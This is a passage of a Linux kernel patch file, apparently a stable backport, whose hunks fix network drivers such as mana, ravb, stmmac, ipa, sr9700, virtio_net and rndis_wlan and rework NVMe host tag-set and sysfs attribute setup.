+ 	fwnode_handle_put(portnp);
+ 
+ 	lan966x_cleanup_ports(lan966x);
+diff --git a/drivers/net/ethernet/microsoft/mana/gdma.h b/drivers/net/ethernet/microsoft/mana/gdma.h
+index 65c24ee49efd9..48b0ab56bdb0a 100644
+--- a/drivers/net/ethernet/microsoft/mana/gdma.h
++++ b/drivers/net/ethernet/microsoft/mana/gdma.h
+@@ -324,9 +324,12 @@ struct gdma_queue_spec {
+ 	};
+ };
+ 
++#define MANA_IRQ_NAME_SZ 32
++
+ struct gdma_irq_context {
+ 	void (*handler)(void *arg);
+ 	void *arg;
++	char name[MANA_IRQ_NAME_SZ];
+ };
+ 
+ struct gdma_context {
+diff --git a/drivers/net/ethernet/microsoft/mana/gdma_main.c b/drivers/net/ethernet/microsoft/mana/gdma_main.c
+index a6f99b4344d93..d674ebda2053d 100644
+--- a/drivers/net/ethernet/microsoft/mana/gdma_main.c
++++ b/drivers/net/ethernet/microsoft/mana/gdma_main.c
+@@ -1233,13 +1233,20 @@ static int mana_gd_setup_irqs(struct pci_dev *pdev)
+ 		gic->handler = NULL;
+ 		gic->arg = NULL;
+ 
++		if (!i)
++			snprintf(gic->name, MANA_IRQ_NAME_SZ, "mana_hwc@pci:%s",
++				 pci_name(pdev));
++		else
++			snprintf(gic->name, MANA_IRQ_NAME_SZ, "mana_q%d@pci:%s",
++				 i - 1, pci_name(pdev));
++
+ 		irq = pci_irq_vector(pdev, i);
+ 		if (irq < 0) {
+ 			err = irq;
+ 			goto free_irq;
+ 		}
+ 
+-		err = request_irq(irq, mana_gd_intr, 0, "mana_intr", gic);
++		err = request_irq(irq, mana_gd_intr, 0, gic->name, gic);
+ 		if (err)
+ 			goto free_irq;
+ 	}
+diff --git a/drivers/net/ethernet/renesas/ravb_main.c b/drivers/net/ethernet/renesas/ravb_main.c
+index b4e0fc7f65bdf..0f54849a38235 100644
+--- a/drivers/net/ethernet/renesas/ravb_main.c
++++ b/drivers/net/ethernet/renesas/ravb_main.c
+@@ -1101,14 +1101,14 @@ static void ravb_error_interrupt(struct net_device *ndev)
+ 	ravb_write(ndev, ~(EIS_QFS | EIS_RESERVED), EIS);
+ 	if (eis & EIS_QFS) {
+ 		ris2 = ravb_read(ndev, RIS2);
+-		ravb_write(ndev, ~(RIS2_QFF0 | RIS2_RFFF | RIS2_RESERVED),
++		ravb_write(ndev, ~(RIS2_QFF0 | RIS2_QFF1 | RIS2_RFFF | RIS2_RESERVED),
+ 			   RIS2);
+ 
+ 		/* Receive Descriptor Empty int */
+ 		if (ris2 & RIS2_QFF0)
+ 			priv->stats[RAVB_BE].rx_over_errors++;
+ 
+-		    /* Receive Descriptor Empty int */
++		/* Receive Descriptor Empty int */
+ 		if (ris2 & RIS2_QFF1)
+ 			priv->stats[RAVB_NC].rx_over_errors++;
+ 
+@@ -2973,6 +2973,9 @@ static int __maybe_unused ravb_suspend(struct device *dev)
+ 	else
+ 		ret = ravb_close(ndev);
+ 
++	if (priv->info->ccc_gac)
++		ravb_ptp_stop(ndev);
++
+ 	return ret;
+ }
+ 
+@@ -3011,6 +3014,9 @@ static int __maybe_unused ravb_resume(struct device *dev)
+ 	/* Restore descriptor base address table */
+ 	ravb_write(ndev, priv->desc_bat_dma, DBAT);
+ 
++	if (priv->info->ccc_gac)
++		ravb_ptp_init(ndev, priv->pdev);
++
+ 	if (netif_running(ndev)) {
+ 		if (priv->wol_enabled) {
+ 			ret = ravb_wol_restore(ndev);
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac5.c b/drivers/net/ethernet/stmicro/stmmac/dwmac5.c
+index 9c2d40f853ed0..413f660172199 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac5.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac5.c
+@@ -186,11 +186,25 @@ static void dwmac5_handle_dma_err(struct net_device *ndev,
+ int dwmac5_safety_feat_config(void __iomem *ioaddr, unsigned int asp,
+ 			      struct stmmac_safety_feature_cfg *safety_feat_cfg)
+ {
++	struct stmmac_safety_feature_cfg all_safety_feats = {
++		.tsoee = 1,
++		.mrxpee = 1,
++		.mestee = 1,
++		.mrxee = 1,
++		.mtxee = 1,
++		.epsi = 1,
++		.edpp = 1,
++		.prtyen = 1,
++		.tmouten = 1,
++	};
+ 	u32 value;
+ 
+ 	if (!asp)
+ 		return -EINVAL;
+ 
++	if (!safety_feat_cfg)
++		safety_feat_cfg = &all_safety_feats;
++
+ 	/* 1. Enable Safety Features */
+ 	value = readl(ioaddr + MTL_ECC_CONTROL);
+ 	value |= MEEAO; /* MTL ECC Error Addr Status Override */
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_ethtool.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_ethtool.c
+index f453b0d093663..35c8dd92d3692 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_ethtool.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_ethtool.c
+@@ -551,16 +551,16 @@ static void stmmac_get_per_qstats(struct stmmac_priv *priv, u64 *data)
+ 		p = (char *)priv + offsetof(struct stmmac_priv,
+ 					    xstats.txq_stats[q].tx_pkt_n);
+ 		for (stat = 0; stat < STMMAC_TXQ_STATS; stat++) {
+-			*data++ = (*(u64 *)p);
+-			p += sizeof(u64 *);
++			*data++ = (*(unsigned long *)p);
++			p += sizeof(unsigned long);
+ 		}
+ 	}
+ 	for (q = 0; q < rx_cnt; q++) {
+ 		p = (char *)priv + offsetof(struct stmmac_priv,
+ 					    xstats.rxq_stats[q].rx_pkt_n);
+ 		for (stat = 0; stat < STMMAC_RXQ_STATS; stat++) {
+-			*data++ = (*(u64 *)p);
+-			p += sizeof(u64 *);
++			*data++ = (*(unsigned long *)p);
++			p += sizeof(unsigned long);
+ 		}
+ 	}
+ }
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index feb209d4b991e..4bba0444c764a 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -1148,6 +1148,11 @@ static int stmmac_init_phy(struct net_device *dev)
+ 		int addr = priv->plat->phy_addr;
+ 		struct phy_device *phydev;
+ 
++		if (addr < 0) {
++			netdev_err(priv->dev, "no phy found\n");
++			return -ENODEV;
++		}
++
+ 		phydev = mdiobus_get_phy(priv->mii, addr);
+ 		if (!phydev) {
+ 			netdev_err(priv->dev, "no phy at addr %d\n", addr);
+diff --git a/drivers/net/ipa/ipa_interrupt.c b/drivers/net/ipa/ipa_interrupt.c
+index c269432f9c2ee..a89a3e3ff81c3 100644
+--- a/drivers/net/ipa/ipa_interrupt.c
++++ b/drivers/net/ipa/ipa_interrupt.c
+@@ -127,6 +127,16 @@ out_power_put:
+ 	return IRQ_HANDLED;
+ }
+ 
++void ipa_interrupt_irq_disable(struct ipa *ipa)
++{
++	disable_irq(ipa->interrupt->irq);
++}
++
++void ipa_interrupt_irq_enable(struct ipa *ipa)
++{
++	enable_irq(ipa->interrupt->irq);
++}
++
+ /* Common function used to enable/disable TX_SUSPEND for an endpoint */
+ static void ipa_interrupt_suspend_control(struct ipa_interrupt *interrupt,
+ 					  u32 endpoint_id, bool enable)
+diff --git a/drivers/net/ipa/ipa_interrupt.h b/drivers/net/ipa/ipa_interrupt.h
+index f31fd9965fdc6..8a1bd5b893932 100644
+--- a/drivers/net/ipa/ipa_interrupt.h
++++ b/drivers/net/ipa/ipa_interrupt.h
+@@ -85,6 +85,22 @@ void ipa_interrupt_suspend_clear_all(struct ipa_interrupt *interrupt);
+  */
+ void ipa_interrupt_simulate_suspend(struct ipa_interrupt *interrupt);
+ 
++/**
++ * ipa_interrupt_irq_enable() - Enable IPA interrupts
++ * @ipa:	IPA pointer
++ *
++ * This enables the IPA interrupt line
++ */
++void ipa_interrupt_irq_enable(struct ipa *ipa);
++
++/**
++ * ipa_interrupt_irq_disable() - Disable IPA interrupts
++ * @ipa:	IPA pointer
++ *
++ * This disables the IPA interrupt line
++ */
++void ipa_interrupt_irq_disable(struct ipa *ipa);
++
+ /**
+  * ipa_interrupt_config() - Configure the IPA interrupt framework
+  * @ipa:	IPA pointer
+diff --git a/drivers/net/ipa/ipa_power.c b/drivers/net/ipa/ipa_power.c
+index 8420f93128a26..8057be8cda801 100644
+--- a/drivers/net/ipa/ipa_power.c
++++ b/drivers/net/ipa/ipa_power.c
+@@ -181,6 +181,17 @@ static int ipa_suspend(struct device *dev)
+ 
+ 	__set_bit(IPA_POWER_FLAG_SYSTEM, ipa->power->flags);
+ 
++	/* Increment the disable depth to ensure that the IRQ won't
++	 * be re-enabled until the matching _enable call in
++	 * ipa_resume(). We do this to ensure that the interrupt
++	 * handler won't run whilst PM runtime is disabled.
++	 *
++	 * Note that disabling the IRQ is NOT the same as disabling
++	 * irq wake. If wakeup is enabled for the IPA then the IRQ
++	 * will still cause the system to wake up, see irq_set_irq_wake().
++	 */
++	ipa_interrupt_irq_disable(ipa);
++
+ 	return pm_runtime_force_suspend(dev);
+ }
+ 
+@@ -193,6 +204,12 @@ static int ipa_resume(struct device *dev)
+ 
+ 	__clear_bit(IPA_POWER_FLAG_SYSTEM, ipa->power->flags);
+ 
++	/* Now that PM runtime is enabled again it's safe
++	 * to turn the IRQ back on and process any data
++	 * that was received during suspend.
++	 */
++	ipa_interrupt_irq_enable(ipa);
++
+ 	return ret;
+ }
+ 
+diff --git a/drivers/net/mdio/mdio-mux-meson-g12a.c b/drivers/net/mdio/mdio-mux-meson-g12a.c
+index 4a2e94faf57e2..c4542ecf56230 100644
+--- a/drivers/net/mdio/mdio-mux-meson-g12a.c
++++ b/drivers/net/mdio/mdio-mux-meson-g12a.c
+@@ -4,6 +4,7 @@
+  */
+ 
+ #include <linux/bitfield.h>
++#include <linux/delay.h>
+ #include <linux/clk.h>
+ #include <linux/clk-provider.h>
+ #include <linux/device.h>
+@@ -150,6 +151,7 @@ static const struct clk_ops g12a_ephy_pll_ops = {
+ 
+ static int g12a_enable_internal_mdio(struct g12a_mdio_mux *priv)
+ {
++	u32 value;
+ 	int ret;
+ 
+ 	/* Enable the phy clock */
+@@ -163,18 +165,25 @@ static int g12a_enable_internal_mdio(struct g12a_mdio_mux *priv)
+ 
+ 	/* Initialize ephy control */
+ 	writel(EPHY_G12A_ID, priv->regs + ETH_PHY_CNTL0);
+-	writel(FIELD_PREP(PHY_CNTL1_ST_MODE, 3) |
+-	       FIELD_PREP(PHY_CNTL1_ST_PHYADD, EPHY_DFLT_ADD) |
+-	       FIELD_PREP(PHY_CNTL1_MII_MODE, EPHY_MODE_RMII) |
+-	       PHY_CNTL1_CLK_EN |
+-	       PHY_CNTL1_CLKFREQ |
+-	       PHY_CNTL1_PHY_ENB,
+-	       priv->regs + ETH_PHY_CNTL1);
++
++	/* Make sure we get a 0 -> 1 transition on the enable bit */
++	value = FIELD_PREP(PHY_CNTL1_ST_MODE, 3) |
++		FIELD_PREP(PHY_CNTL1_ST_PHYADD, EPHY_DFLT_ADD) |
++		FIELD_PREP(PHY_CNTL1_MII_MODE, EPHY_MODE_RMII) |
++		PHY_CNTL1_CLK_EN |
++		PHY_CNTL1_CLKFREQ;
++	writel(value, priv->regs + ETH_PHY_CNTL1);
+ 	writel(PHY_CNTL2_USE_INTERNAL |
+ 	       PHY_CNTL2_SMI_SRC_MAC |
+ 	       PHY_CNTL2_RX_CLK_EPHY,
+ 	       priv->regs + ETH_PHY_CNTL2);
+ 
++	value |= PHY_CNTL1_PHY_ENB;
++	writel(value, priv->regs + ETH_PHY_CNTL1);
++
++	/* The phy needs a bit of time to power up */
++	mdelay(10);
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/phy/mdio_bus.c b/drivers/net/phy/mdio_bus.c
+index 1cd604cd1fa1b..16e021b477f06 100644
+--- a/drivers/net/phy/mdio_bus.c
++++ b/drivers/net/phy/mdio_bus.c
+@@ -108,7 +108,12 @@ EXPORT_SYMBOL(mdiobus_unregister_device);
+ 
+ struct phy_device *mdiobus_get_phy(struct mii_bus *bus, int addr)
+ {
+-	struct mdio_device *mdiodev = bus->mdio_map[addr];
++	struct mdio_device *mdiodev;
++
++	if (addr < 0 || addr >= ARRAY_SIZE(bus->mdio_map))
++		return NULL;
++
++	mdiodev = bus->mdio_map[addr];
+ 
+ 	if (!mdiodev)
+ 		return NULL;
+diff --git a/drivers/net/usb/cdc_ether.c b/drivers/net/usb/cdc_ether.c
+index e11f70911acc1..fb5f59d0d55d7 100644
+--- a/drivers/net/usb/cdc_ether.c
++++ b/drivers/net/usb/cdc_ether.c
+@@ -1001,6 +1001,12 @@ static const struct usb_device_id	products[] = {
+ 				      USB_CDC_SUBCLASS_ETHERNET,
+ 				      USB_CDC_PROTO_NONE),
+ 	.driver_info = (unsigned long)&wwan_info,
++}, {
++	/* Cinterion PLS62-W modem by GEMALTO/THALES */
++	USB_DEVICE_AND_INTERFACE_INFO(0x1e2d, 0x005b, USB_CLASS_COMM,
++				      USB_CDC_SUBCLASS_ETHERNET,
++				      USB_CDC_PROTO_NONE),
++	.driver_info = (unsigned long)&wwan_info,
+ }, {
+ 	/* Cinterion PLS83/PLS63 modem by GEMALTO/THALES */
+ 	USB_DEVICE_AND_INTERFACE_INFO(0x1e2d, 0x0069, USB_CLASS_COMM,
+diff --git a/drivers/net/usb/r8152.c b/drivers/net/usb/r8152.c
+index a481a1d831e2f..23da1d9dafd1f 100644
+--- a/drivers/net/usb/r8152.c
++++ b/drivers/net/usb/r8152.c
+@@ -9836,6 +9836,7 @@ static const struct usb_device_id rtl8152_table[] = {
+ 	REALTEK_USB_DEVICE(VENDOR_ID_MICROSOFT, 0x07ab),
+ 	REALTEK_USB_DEVICE(VENDOR_ID_MICROSOFT, 0x07c6),
+ 	REALTEK_USB_DEVICE(VENDOR_ID_MICROSOFT, 0x0927),
++	REALTEK_USB_DEVICE(VENDOR_ID_MICROSOFT, 0x0c5e),
+ 	REALTEK_USB_DEVICE(VENDOR_ID_SAMSUNG, 0xa101),
+ 	REALTEK_USB_DEVICE(VENDOR_ID_LENOVO,  0x304f),
+ 	REALTEK_USB_DEVICE(VENDOR_ID_LENOVO,  0x3054),
+diff --git a/drivers/net/usb/sr9700.c b/drivers/net/usb/sr9700.c
+index 5a53e63d33a60..3164451e1010c 100644
+--- a/drivers/net/usb/sr9700.c
++++ b/drivers/net/usb/sr9700.c
+@@ -413,7 +413,7 @@ static int sr9700_rx_fixup(struct usbnet *dev, struct sk_buff *skb)
+ 		/* ignore the CRC length */
+ 		len = (skb->data[1] | (skb->data[2] << 8)) - 4;
+ 
+-		if (len > ETH_FRAME_LEN || len > skb->len)
++		if (len > ETH_FRAME_LEN || len > skb->len || len < 0)
+ 			return 0;
+ 
+ 		/* the last packet of current skb */
+diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
+index 86e52454b5b5c..3cd15f16090f1 100644
+--- a/drivers/net/virtio_net.c
++++ b/drivers/net/virtio_net.c
+@@ -1873,8 +1873,10 @@ static netdev_tx_t start_xmit(struct sk_buff *skb, struct net_device *dev)
+ 	 */
+ 	if (sq->vq->num_free < 2+MAX_SKB_FRAGS) {
+ 		netif_stop_subqueue(dev, qnum);
+-		if (!use_napi &&
+-		    unlikely(!virtqueue_enable_cb_delayed(sq->vq))) {
++		if (use_napi) {
++			if (unlikely(!virtqueue_enable_cb_delayed(sq->vq)))
++				virtqueue_napi_schedule(&sq->napi, sq->vq);
++		} else if (unlikely(!virtqueue_enable_cb_delayed(sq->vq))) {
+ 			/* More just got used, free them then recheck. */
+ 			free_old_xmit_skbs(sq, false);
+ 			if (sq->vq->num_free >= 2+MAX_SKB_FRAGS) {
+diff --git a/drivers/net/wan/fsl_ucc_hdlc.c b/drivers/net/wan/fsl_ucc_hdlc.c
+index 22edea6ca4b81..1c53b55469270 100644
+--- a/drivers/net/wan/fsl_ucc_hdlc.c
++++ b/drivers/net/wan/fsl_ucc_hdlc.c
+@@ -1243,9 +1243,11 @@ static int ucc_hdlc_probe(struct platform_device *pdev)
+ free_dev:
+ 	free_netdev(dev);
+ undo_uhdlc_init:
+-	iounmap(utdm->siram);
++	if (utdm)
++		iounmap(utdm->siram);
+ unmap_si_regs:
+-	iounmap(utdm->si_regs);
++	if (utdm)
++		iounmap(utdm->si_regs);
+ free_utdm:
+ 	if (uhdlc_priv->tsa)
+ 		kfree(utdm);
+diff --git a/drivers/net/wireless/rndis_wlan.c b/drivers/net/wireless/rndis_wlan.c
+index 82a7458e01aec..bf72e5fd39cf4 100644
+--- a/drivers/net/wireless/rndis_wlan.c
++++ b/drivers/net/wireless/rndis_wlan.c
+@@ -696,8 +696,8 @@ static int rndis_query_oid(struct usbnet *dev, u32 oid, void *data, int *len)
+ 		struct rndis_query	*get;
+ 		struct rndis_query_c	*get_c;
+ 	} u;
+-	int ret, buflen;
+-	int resplen, respoffs, copylen;
++	int ret;
++	size_t buflen, resplen, respoffs, copylen;
+ 
+ 	buflen = *len + sizeof(*u.get);
+ 	if (buflen < CONTROL_BUFFER_SIZE)
+@@ -732,22 +732,15 @@ static int rndis_query_oid(struct usbnet *dev, u32 oid, void *data, int *len)
+ 
+ 		if (respoffs > buflen) {
+ 			/* Device returned data offset outside buffer, error. */
+-			netdev_dbg(dev->net, "%s(%s): received invalid "
+-				"data offset: %d > %d\n", __func__,
+-				oid_to_string(oid), respoffs, buflen);
++			netdev_dbg(dev->net,
++				   "%s(%s): received invalid data offset: %zu > %zu\n",
++				   __func__, oid_to_string(oid), respoffs, buflen);
+ 
+ 			ret = -EINVAL;
+ 			goto exit_unlock;
+ 		}
+ 
+-		if ((resplen + respoffs) > buflen) {
+-			/* Device would have returned more data if buffer would
+-			 * have been big enough. Copy just the bits that we got.
+-			 */
+-			copylen = buflen - respoffs;
+-		} else {
+-			copylen = resplen;
+-		}
++		copylen = min(resplen, buflen - respoffs);
+ 
+ 		if (copylen > *len)
+ 			copylen = *len;
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index 1ded96d1bfd21..25ade4ce8e0a7 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -1088,7 +1088,7 @@ u32 nvme_command_effects(struct nvme_ctrl *ctrl, struct nvme_ns *ns, u8 opcode)
+ 	if (ns) {
+ 		if (ns->head->effects)
+ 			effects = le32_to_cpu(ns->head->effects->iocs[opcode]);
+-		if (ns->head->ids.csi == NVME_CAP_CSS_NVM)
++		if (ns->head->ids.csi == NVME_CSI_NVM)
+ 			effects |= nvme_known_nvm_effects(opcode);
+ 		if (effects & ~(NVME_CMD_EFFECTS_CSUPP | NVME_CMD_EFFECTS_LBCC))
+ 			dev_warn_once(ctrl->device,
+@@ -3903,10 +3903,11 @@ static umode_t nvme_dev_attrs_are_visible(struct kobject *kobj,
+ 	return a->mode;
+ }
+ 
+-static const struct attribute_group nvme_dev_attrs_group = {
++const struct attribute_group nvme_dev_attrs_group = {
+ 	.attrs		= nvme_dev_attrs,
+ 	.is_visible	= nvme_dev_attrs_are_visible,
+ };
++EXPORT_SYMBOL_GPL(nvme_dev_attrs_group);
+ 
+ static const struct attribute_group *nvme_dev_attr_groups[] = {
+ 	&nvme_dev_attrs_group,
+@@ -4839,8 +4840,7 @@ void nvme_complete_async_event(struct nvme_ctrl *ctrl, __le16 status,
+ EXPORT_SYMBOL_GPL(nvme_complete_async_event);
+ 
+ int nvme_alloc_admin_tag_set(struct nvme_ctrl *ctrl, struct blk_mq_tag_set *set,
+-		const struct blk_mq_ops *ops, unsigned int flags,
+-		unsigned int cmd_size)
++		const struct blk_mq_ops *ops, unsigned int cmd_size)
+ {
+ 	int ret;
+ 
+@@ -4850,7 +4850,9 @@ int nvme_alloc_admin_tag_set(struct nvme_ctrl *ctrl, struct blk_mq_tag_set *set,
+ 	if (ctrl->ops->flags & NVME_F_FABRICS)
+ 		set->reserved_tags = NVMF_RESERVED_TAGS;
+ 	set->numa_node = ctrl->numa_node;
+-	set->flags = flags;
++	set->flags = BLK_MQ_F_NO_SCHED;
++	if (ctrl->ops->flags & NVME_F_BLOCKING)
++		set->flags |= BLK_MQ_F_BLOCKING;
+ 	set->cmd_size = cmd_size;
+ 	set->driver_data = ctrl;
+ 	set->nr_hw_queues = 1;
+@@ -4894,8 +4896,8 @@ void nvme_remove_admin_tag_set(struct nvme_ctrl *ctrl)
+ EXPORT_SYMBOL_GPL(nvme_remove_admin_tag_set);
+ 
+ int nvme_alloc_io_tag_set(struct nvme_ctrl *ctrl, struct blk_mq_tag_set *set,
+-		const struct blk_mq_ops *ops, unsigned int flags,
+-		unsigned int nr_maps, unsigned int cmd_size)
++		const struct blk_mq_ops *ops, unsigned int nr_maps,
++		unsigned int cmd_size)
+ {
+ 	int ret;
+ 
+@@ -4904,7 +4906,9 @@ int nvme_alloc_io_tag_set(struct nvme_ctrl *ctrl, struct blk_mq_tag_set *set,
+ 	set->queue_depth = ctrl->sqsize + 1;
+ 	set->reserved_tags = NVMF_RESERVED_TAGS;
+ 	set->numa_node = ctrl->numa_node;
+-	set->flags = flags;
++	set->flags = BLK_MQ_F_SHOULD_MERGE;
++	if (ctrl->ops->flags & NVME_F_BLOCKING)
++		set->flags |= BLK_MQ_F_BLOCKING;
+ 	set->cmd_size = cmd_size,
+ 	set->driver_data = ctrl;
+ 	set->nr_hw_queues = ctrl->queue_count - 1;
+@@ -5080,7 +5084,10 @@ int nvme_init_ctrl(struct nvme_ctrl *ctrl, struct device *dev,
+ 			ctrl->instance);
+ 	ctrl->device->class = nvme_class;
+ 	ctrl->device->parent = ctrl->dev;
+-	ctrl->device->groups = nvme_dev_attr_groups;
++	if (ops->dev_attr_groups)
++		ctrl->device->groups = ops->dev_attr_groups;
++	else
++		ctrl->device->groups = nvme_dev_attr_groups;
+ 	ctrl->device->release = nvme_free_ctrl;
+ 	dev_set_drvdata(ctrl->device, ctrl);
+ 	ret = dev_set_name(ctrl->device, "nvme%d", ctrl->instance);
+diff --git a/drivers/nvme/host/fc.c b/drivers/nvme/host/fc.c
+index 20b0c29a9a341..6c3d469eed7e3 100644
+--- a/drivers/nvme/host/fc.c
++++ b/drivers/nvme/host/fc.c
+@@ -2903,7 +2903,7 @@ nvme_fc_create_io_queues(struct nvme_fc_ctrl *ctrl)
+ 	nvme_fc_init_io_queues(ctrl);
+ 
+ 	ret = nvme_alloc_io_tag_set(&ctrl->ctrl, &ctrl->tag_set,
+-			&nvme_fc_mq_ops, BLK_MQ_F_SHOULD_MERGE, 1,
++			&nvme_fc_mq_ops, 1,
+ 			struct_size((struct nvme_fcp_op_w_sgl *)NULL, priv,
+ 				    ctrl->lport->ops->fcprqst_priv_sz));
+ 	if (ret)
+@@ -3508,13 +3508,6 @@ nvme_fc_init_ctrl(struct device *dev, struct nvmf_ctrl_options *opts,
+ 
+ 	nvme_fc_init_queue(ctrl, 0);
+ 
+-	ret = nvme_alloc_admin_tag_set(&ctrl->ctrl, &ctrl->admin_tag_set,
+-			&nvme_fc_admin_mq_ops, BLK_MQ_F_NO_SCHED,
+-			struct_size((struct nvme_fcp_op_w_sgl *)NULL, priv,
+-				    ctrl->lport->ops->fcprqst_priv_sz));
+-	if (ret)
+-		goto out_free_queues;
+-
+ 	/*
+ 	 * Would have been nice to init io queues tag set as well.
+ 	 * However, we require interaction from the controller
+@@ -3524,10 +3517,17 @@ nvme_fc_init_ctrl(struct device *dev, struct nvmf_ctrl_options *opts,
+ 
+ 	ret = nvme_init_ctrl(&ctrl->ctrl, dev, &nvme_fc_ctrl_ops, 0);
+ 	if (ret)
+-		goto out_cleanup_tagset;
++		goto out_free_queues;
+ 
+ 	/* at this point, teardown path changes to ref counting on nvme ctrl */
+ 
++	ret = nvme_alloc_admin_tag_set(&ctrl->ctrl, &ctrl->admin_tag_set,
++			&nvme_fc_admin_mq_ops,
++			struct_size((struct nvme_fcp_op_w_sgl *)NULL, priv,
++				    ctrl->lport->ops->fcprqst_priv_sz));
++	if (ret)
++		goto fail_ctrl;
++
+ 	spin_lock_irqsave(&rport->lock, flags);
+ 	list_add_tail(&ctrl->ctrl_list, &rport->ctrl_list);
+ 	spin_unlock_irqrestore(&rport->lock, flags);
+@@ -3579,8 +3579,6 @@ fail_ctrl:
+ 
+ 	return ERR_PTR(-EIO);
+ 
+-out_cleanup_tagset:
+-	nvme_remove_admin_tag_set(&ctrl->ctrl);
+ out_free_queues:
+ 	kfree(ctrl->queues);
+ out_free_ida:
+diff --git a/drivers/nvme/host/nvme.h b/drivers/nvme/host/nvme.h
+index cbda8a19409bf..01d90424af534 100644
+--- a/drivers/nvme/host/nvme.h
++++ b/drivers/nvme/host/nvme.h
+@@ -508,6 +508,9 @@ struct nvme_ctrl_ops {
+ 	unsigned int flags;
+ #define NVME_F_FABRICS			(1 << 0)
+ #define NVME_F_METADATA_SUPPORTED	(1 << 1)
++#define NVME_F_BLOCKING			(1 << 2)
++
++	const struct attribute_group **dev_attr_groups;
+ 	int (*reg_read32)(struct nvme_ctrl *ctrl, u32 off, u32 *val);
+ 	int (*reg_write32)(struct nvme_ctrl *ctrl, u32 off, u32 val);
+ 	int (*reg_read64)(struct nvme_ctrl *ctrl, u32 off, u64 *val);
+@@ -738,12 +741,11 @@ void nvme_start_ctrl(struct nvme_ctrl *ctrl);
+ void nvme_stop_ctrl(struct nvme_ctrl *ctrl);
+ int nvme_init_ctrl_finish(struct nvme_ctrl *ctrl);
+ int nvme_alloc_admin_tag_set(struct nvme_ctrl *ctrl, struct blk_mq_tag_set *set,
+-		const struct blk_mq_ops *ops, unsigned int flags,
+-		unsigned int cmd_size);
++		const struct blk_mq_ops *ops, unsigned int cmd_size);
+ void nvme_remove_admin_tag_set(struct nvme_ctrl *ctrl);
+ int nvme_alloc_io_tag_set(struct nvme_ctrl *ctrl, struct blk_mq_tag_set *set,
+-		const struct blk_mq_ops *ops, unsigned int flags,
+-		unsigned int nr_maps, unsigned int cmd_size);
++		const struct blk_mq_ops *ops, unsigned int nr_maps,
++		unsigned int cmd_size);
+ void nvme_remove_io_tag_set(struct nvme_ctrl *ctrl);
+ 
+ void nvme_remove_namespaces(struct nvme_ctrl *ctrl);
+@@ -857,6 +859,7 @@ int nvme_dev_uring_cmd(struct io_uring_cmd *ioucmd, unsigned int issue_flags);
+ extern const struct attribute_group *nvme_ns_id_attr_groups[];
+ extern const struct pr_ops nvme_pr_ops;
+ extern const struct block_device_operations nvme_ns_head_ops;
++extern const struct attribute_group nvme_dev_attrs_group;
+ 
+ struct nvme_ns *nvme_find_path(struct nvme_ns_head *head);
+ #ifdef CONFIG_NVME_MULTIPATH
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index 115d81def5671..d839689af17ce 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -158,8 +158,6 @@ struct nvme_dev {
+ 	unsigned int nr_allocated_queues;
+ 	unsigned int nr_write_queues;
+ 	unsigned int nr_poll_queues;
+-
+-	bool attrs_added;
+ };
+ 
+ static int io_queue_depth_set(const char *val, const struct kernel_param *kp)
+@@ -1367,7 +1365,7 @@ static enum blk_eh_timer_return nvme_timeout(struct request *req)
+ 	else
+ 		nvme_poll_irqdisable(nvmeq);
+ 
+-	if (blk_mq_request_completed(req)) {
++	if (blk_mq_rq_state(req) != MQ_RQ_IN_FLIGHT) {
+ 		dev_warn(dev->ctrl.device,
+ 			 "I/O %d QID %d timeout, completion polled\n",
+ 			 req->tag, nvmeq->qid);
+@@ -2241,11 +2239,17 @@ static struct attribute *nvme_pci_attrs[] = {
+ 	NULL,
+ };
+ 
+-static const struct attribute_group nvme_pci_attr_group = {
++static const struct attribute_group nvme_pci_dev_attrs_group = {
+ 	.attrs		= nvme_pci_attrs,
+ 	.is_visible	= nvme_pci_attrs_are_visible,
+ };
+ 
++static const struct attribute_group *nvme_pci_dev_attr_groups[] = {
++	&nvme_dev_attrs_group,
++	&nvme_pci_dev_attrs_group,
++	NULL,
++};
++
+ /*
+  * nirqs is the number of interrupts available for write and read
+  * queues. The core already reserved an interrupt for the admin queue.
+@@ -2935,10 +2939,6 @@ static void nvme_reset_work(struct work_struct *work)
+ 		goto out;
+ 	}
+ 
+-	if (!dev->attrs_added && !sysfs_create_group(&dev->ctrl.device->kobj,
+-			&nvme_pci_attr_group))
+-		dev->attrs_added = true;
+-
+ 	nvme_start_ctrl(&dev->ctrl);
+ 	return;
+ 
+@@ -3011,6 +3011,7 @@ static const struct nvme_ctrl_ops nvme_pci_ctrl_ops = {
+ 	.name			= "pcie",
+ 	.module			= THIS_MODULE,
+ 	.flags			= NVME_F_METADATA_SUPPORTED,
++	.dev_attr_groups	= nvme_pci_dev_attr_groups,
+ 	.reg_read32		= nvme_pci_reg_read32,
+ 	.reg_write32		= nvme_pci_reg_write32,
+ 	.reg_read64		= nvme_pci_reg_read64,
+@@ -3209,13 +3210,6 @@ static void nvme_shutdown(struct pci_dev *pdev)
+ 	nvme_disable_prepare_reset(dev, true);
+ }
+ 
+-static void nvme_remove_attrs(struct nvme_dev *dev)
+-{
+-	if (dev->attrs_added)
+-		sysfs_remove_group(&dev->ctrl.device->kobj,
+-				   &nvme_pci_attr_group);
+-}
+-
+ /*
+  * The driver's remove may be called on a device in a partially initialized
+  * state. This function must not have any dependencies on the device state in
+@@ -3237,7 +3231,6 @@ static void nvme_remove(struct pci_dev *pdev)
+ 	nvme_stop_ctrl(&dev->ctrl);
+ 	nvme_remove_namespaces(&dev->ctrl);
+ 	nvme_dev_disable(dev, true);
+-	nvme_remove_attrs(dev);
+ 	nvme_free_host_mem(dev);
+ 	nvme_dev_remove_admin(dev);
